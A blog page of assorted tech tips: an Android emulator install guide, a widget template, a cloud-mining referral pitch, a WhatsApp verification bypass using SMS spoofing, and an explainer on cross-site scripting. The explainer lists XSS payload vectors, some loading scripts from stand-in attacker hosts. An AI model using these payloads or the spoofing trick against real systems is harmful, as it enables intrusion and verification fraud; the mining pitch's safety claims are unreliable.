How to Install MEmu Android Lollipop Emulator on PC [Windows 10/7/8.1 32-Bit & 64-Bit]

February 20, 2018

Hello guys, and today is the post about how to Install MEmu Android Lollipop Emulator on PC. 

Most of the Android emulators in the market come with either Android Kitkat or JellyBean, but since both the Android versions are now obsolete most newer games and apps don’t run on them. Now, we can’t simply use official Android Device manager’s emulator to run our custom apps or games so there remain very few alternatives. We bring you, one such method by using MEmu Emulator. Read on below for the complete tutorial on How to install Lollipop Android Emulator on PC or Laptop (Windows 10/8/7 64-bit & 32-bit.

Tutorial to Install MEmu Lollipop Emulator for PC on Windows 10 / 7 /8.1

Pre-Requisites –

• A Windows PC or Laptop with a decent configuration 2GB RAM & above.
• Now, MEmu lollipop OVA requires Old MEmu 4.4 based emulator already installed on your system. So, if in case your system doesn’t have MEmu installed. Download the Old MEmu emulator and install it from the download link given below –
  Click here to Download MEmu 3.0.7 full Installer [Android 4.4 Base].

Tutorial –

• In this step, we will apply the Android lollipop over the MEmu Base we have already installed.  The Android Lollipop emulator ova is separate and hence must be separately downloaded and applied over the base, we will require this file  –
  Click here to Download Lollipop Android Emulator for PC / Laptop (Windows 7 / 8.1 /10)Note – Please note that simply downloading the Lollipop ova won’t work, MEmu base MUST be already installed.
• Once, you have downloaded the above Lollipop patch, double click & Open it. You will see a message of “Successfully Updated”.
• Now from either the Start menu or Desktop shortcut, launch “Multi-MEmu” App.(Not the default MEmu) It will open a window as shown in the image below

  

  Multi-MEmu HomeScreen

• Here select the “Create Android 5.1 emulator” option.
• It will now start creating your Android Lollipop image as shown below, please wait until the process is completed.

  

  Android Lollipop Emulator installation

  
  
• Once, the creation process is complete you will now see option to start the new MEmu1 “new lollipop image as shown in the image below –

  

  Click on Start to launch MEmu Lollipop Emulator for Windows

  Click on “Start” to launch the MEmu Lollipop emulator. It will now show a loading screen, please allow the loading to complete.
• After the loading is complete , it will boot you onto your default Android lollipop homescreen as shown –

  

  Android Lollipop Emulator homescreen & Notification Drawer

  You can even use Playstore to install apps & use Google services.
• Besides, you can even use your Keyboard to simulate touch, play games via your keyboard & mouse , use rooted apps on your MEmu lollipop emulator.
• Here’s a screenshot showing the Android version, incase if you face any problems while installing MEmu or the Lollipop patch feel free to comment below .

  

  Android Lollipop Emulator for PC – Windows 10 / 8 / 7

Read More ...

Material Design custom widget for your Android Homescreen | Surajit Sonowal

February 20, 2018

Location is updated whenever there is data connection. Deep green bar shows the battery status.

Steps to get this on your phone :

1. Install Zooper widget app on your phone. Download the apk here. 

2. Download this file and copy it to the path 

/storage/emulated/0/ZooperWidget/Templates

3. Go to Homescreen, Add a widget. Select this widget

Click Tap to start. Select SDCard and choose the template Green clock. Done

Thank You !! Share with your friends.

Read More ...

EOBOT Mining Trick : Truly Automated mining site | Create an account and visit daily to Mine

February 20, 2018

Hi guys, I am back with a new cryptomining site EOBOT!

EOBOT is operational since 2013 and located in the United States, is a real-time exchange allowing trading between Bitcoin, Ethereum, Litecoin, Bitcoin Cash, Dogecoin, Ripple, Dash, Golem, BitShares, CureCoin, NEM, Monero, Zcash, Factom, Bytecoin, STEEM, Lisk, MaidSafeCoin, USD, Gridcoin, and Ethereum Classic. Your funds are always safe due to their Public Audit and Hacker policies!

What you need to do is very simple.

Just go to this link EOBOT and create an account. It takes only 2 minutes.

Have a look at my account.

Now visit daily to collect from their faucet. Set Mining to GHS4.0 before collecting from Faucet for maximum benefit.

After that come back to Account and select your coin to mine. Start with Dogecoin or Ripple. You can also deposit BTC or any other coin and convert to GHS4.0 for maximum benefit.

You can also install their app to know real time balance. The best part is that you don't need to spend lot on mining rigs. Everything is done in the cloud. So even if you logout from the site, mining will still be on.

Don't forget to exchange your mined coins to Cloud SHA-256 4.0 24 Hour Rental for maximum benefit.

Want to earn more?

• You can create a free account in Freebitco.in and Freedoge.co.in and collect free coins every hour. Once it reaches minimum withdrawal limit, you can withdraw to EOBOT and use it for mining.

• Go to Profile -> Referrals and refer your friend to EOBOT. You will get bonus for every friend you invite.

So Sign up today and earn a passive income, don't forget to share this to your friends.
If you face any prolbem, feel free to comment. Will help you.
Thank You !!

Read More ...

Send WhatsApp message without using any Phone number

January 16, 2018

Hello friends, I,m Surajit Sonowal. In this post, I'll tell you how can you use WhatsApp without using your mobile number, i.e. WhatsApp without using any number. Friends, you might be knowing that Facebook has launched web version of the WhatsApp currently for the chrome browser  which is becoming very popular day by day.



For messaging anyone without using any number, do the following steps:

Steps:-

• Uninstall WhatsApp from your Android phone.
• Download and install WhatsApp again.
• Block all messaging services on your phone. Keeping your phone to flight mode will automatically block all messaging services.
• Now open WhatsApp and Enter your number. In such case WhatsApp will accept numbers, but will not be able to send any verification message.
• WhatsApp verification is not yet done, so users will not be able to use it.
• Now WhatsApp wil ask you for alternate method of verification. Click on 'Verify through SMS' option and provide your email address.
  Press Send button and within 2 second, press Cancel button. This will stop the authorization process.
• Now another app Spoof Text Message will be needed to spoof the message.
• This app will ask for some details. Use below details :
• To: +447900347295 
• From: + (country code) ( mobile number) 
• Message: Your e-mail address

Now, your message will be sent from a spoof number and you can chat with your Friends with this spoofed number.

Read More ...

How to stop autoplay of videos in Facebook

January 16, 2018

Hi friends, you might have seen that Facebook autoplays videos that are listed on your timeline, although muted. This involves useless consumption of data. Even if you don't want to see the video, it gets downloaded and is played. To get rid of this, you can do simple tweak in Facebook setting, mentioned below.

Steps:

• Login to your Facebook account.
• Go to the "Settings", see below:

Click on "Videos" on left.

• Alternatively, you can directly hit This URL to go to videos setting page.
  https://www.facebook.com/settings/?tab=videos

Change "Auto-Play Videos" to off.

Don't forget to share the post.

Surajit Sonowal TricksIdeas.

ThankYou!!!

Read More ...

Cross Site Scripting Attack | Surajit Sonowal

January 14, 2018

Hello guys, I,m Surajit Sonowal. And today here the post is about Cross Site Scripting Attack.
Here we go....

What is Cross Site Scripting?

Hackers are constantly experimenting with a wide repertoire of hacking techniques to compromise websites and web applications and make off with a treasure trove of sensitive data including credit card numbers, social security numbers and even medical records.

Cross Site Scripting (also known as XSS or CSS) is generally believed to be one of the most common application layer hacking techniques.

In the pie-chart below, created by the Web Hacking Incident Database for 2011 (WHID) clearly shows that whilst many different attack methods exist, SQL injection and XSS are the most popular. To add to this, many other attack methods, such as Information Disclosures, Content Spoofing and Stolen Credentials could all be side-effects of an XSS attack.

In general, cross-site scripting refers to that hacking technique that leverages vulnerabilities in the code of a web application to allow an attacker to send malicious content from an end-user and collect some type of data from the victim.

Today, websites rely heavily on complex web applications to deliver different output or content to a wide variety of users according to set preferences and specific needs. This arms organizations with the ability to provide better value to their customers and prospects. However, dynamic websites suffer from serious vulnerabilities rendering organizations helpless and prone to cross site scripting attacks on their data.

"A web page contains both text and HTML markup that is generated by the server and interpreted by the client browser. Web sites that generate only static pages are able to have full control over how the browser interprets these pages. Web sites that generate dynamic pages do not have complete control over how their outputs are interpreted by the client. The heart of the issue is that if mistrusted content can be introduced into a dynamic page, neither the web site nor the client has enough information to recognize that this has happened and take protective actions." (CERT Coordination Center).

Cross Site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and which is distributed over any possible means on the internet.

As a hacking tool, the attacker can formulate and distribute a custom-crafted CSS URL just by using a browser to test the dynamic website response. The attacker also needs to know some HTML, JavaScript and a dynamic language, to produce a URL which is not too suspicious-looking, in order to attack a XSS vulnerable website.

Any web page which passes parameters to a database can be vulnerable to this hacking technique. Usually these are present in Login forms, Forgot Password forms, etc…

N.B. Often people refer to Cross Site Scripting as CSS or XSS, which is can be confused with Cascading Style Sheets (CSS).

The Theory of XSS

In a typical XSS attack the hacker infects a legitimate web page with his malicious client-side script. When a user visits this web page the script is downloaded to his browser and executed. There are many slight variations to this theme, however all XSS attacks follow this pattern, which is depicted in the diagram below.

As a web developer you are putting measures in place to secure the first step of the attack. You want to prevent the hacker from infecting your innocent web page with his malicious script. There are various ways to do that, and this article goes into some technical detail on the most important techniques that you must use to disable this sort of attack against your users.

XSS Attack Vectors

So how does a hacker infect your web page in the first place? You might think, that for an attacker to make changes to your web page he must first break the security of the web server and be able to upload and modify files on that server. Unfortunately for you an XSS attack is much easier than that.

Internet applications today are not static HTML pages. They are dynamic and filled with ever changing content. Modern web pages pull data from many different sources. This data is amalgamated with your own web page and can contain simple text, or images, and can also contain HTML tags such as <p> for paragraph, <img> for image and <script> for scripts. Many times the hacker will use the ‘comments’ feature of your web page to insert a comment that contains a script. Every user who views that comment will download the script which will execute on his browser, causing undesirable behaviour. Something as simple as a Facebook post on your wall can contain a malicious script, which if not filtered by the Facebook servers will be injected into your Wall and execute on the browser of every person who visits your Facebook profile.

By now you should be aware that any sort of data that can land on your web page from an external source has the potential of being infected with a malicious script, but in what form does the data come?

<SCRIPT>

The <SCRIPT> tag is the most popular way and sometimes easiest to detect. It can arrive to your page in the following forms:

External script:

<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>

Embedded script:

<SCRIPT> alert(“XSS”); </SCRIPT>

<BODY>

The <BODY> tag can contain an embedded script by using the ONLOAD event, as shown below:

<BODY ONLOAD=alert("XSS")>

The BACKGROUND attribute can be similarly exploited:

<BODY BACKGROUND="javascript:alert('XSS')">

<IMG>

Some browsers will execute a script when found in the <IMG> tag as shown here:

<IMG SRC="javascript:alert('XSS');">

There are some variations of this that work in some browsers:

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<IFRAME>

The <IFRAME> tag allows you to import HTML into a page. This important HTML can contain a script.

<IFRAME SRC=”http://hacker-site.com/xss.html”>

<INPUT>

If the TYPE attribute of the <INPUT> tag is set to “IMAGE”, it can be manipulated to embed a script:

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<LINK>

The <LINK> tag, which is often used to link to external style sheets could contain a script:

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<TABLE>

The BACKGROUND attribute of the TABLE tag can be exploited to refer to a script instead of an image:

<TABLE BACKGROUND="javascript:alert('XSS')">

The same applies to the <TD> tag, used to separate cells inside a table:

<TD BACKGROUND="javascript:alert('XSS')">

<DIV>

The <DIV> tag, similar to the <TABLE> and <TD> tags can also specify a background and therefore embed a script:

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

The <DIV> STYLE attribute can also be manipulated in the following way:

<DIV STYLE="width: expression(alert('XSS'));">

<OBJECT>

The <OBJECT> tag can be used to pull in a script from an external site in the following way:

<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">

<EMBED>

If the hacker places a malicious script inside a flash file, it can be injected in the following way:

<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always">

Is your site vulnerable to Cross Site Scripting?

Our experience leads us to conclude that the cross-site scripting vulnerability is one of the most highly widespread flaw on the Internet and will occur anywhere a web application uses input from a user in the output it generates without validating it. Our own research shows that over a third of the organizations applying for our free audit service are vulnerable to Cross Site Scripting. And the trend is upward.

Example of a Cross Site Scripting Attack

As a simple example, imagine a search engine site which is open to an XSS attack. The query screen of the search engine is a simple single field form with a submit button. Whereas the results page, displays both the matched results and the text you are looking for.

Search Results for "XSS Vulnerability"

To be able to bookmark pages, search engines generally leave the entered variables in the URL address. In this case the URL would look like:

http://test.searchengine.com/search.php?q=XSS%20

Vulnerability

Next we try to send the following query to the search engine:

<script type="text/javascript">
alert ('This is an XSS Vulnerability')
</script>

By submitting the query to search.php, it is encoded and the resulting URL would be something like:

http://test.searchengine.com/search.php?q=%3Cscript%3

Ealert%28%91This%20is%20an%20XSS%20Vulnerability%92%2

9%3C%2Fscript%3E

Upon loading the results page, the test search engine would probably display no results for the search but it will display a JavaScript alert which was injected into the page by using the XSS vulnerability.

How to Check for Cross Site Scripting Vulnerabilities

To check for Cross site scripting vulnerabilities, use a Web Vulnerability Scanner. A Web Vulnerability Scanner crawls your entire website and automatically checks for Cross Site Scripting vulnerabilities. It will indicate which URLs/scripts are vulnerable to these attacks so that you can fix the vulnerability easily. Besides Cross site scripting vulnerabilities a web application scanner will also check for SQL Injection & other web vulnerabilities.

Acunetix Web Vulnerability Scanner scans for SQL injection, Cross site scripting, Google hacking and many more vulnerabilities.

Preventing Cross Site Scripting Attacks

The purpose of this article is define Cross Site Scripting attacks and give some practical examples. Preventing XSS attacks requires diligence from the part of the programmers and the necessary security testing. You can learn more about preventing cross-site scripting attacks here.

Scanning for XSS Vulnerabilities with Acunetix Web Vulnerability Scanner Trial Edition!

To check whether your website has cross site scripting vulnerabilities, download the Trial Edition of Acunetix WVS. This version will scan any website / web application for XSS vulnerabilities and it will also reveal all the essential information related to it, such as the vulnerability location and remediation techniques. Scanning for XSS is normally a quick exercise (depending on the size of the web-site).

Read More ...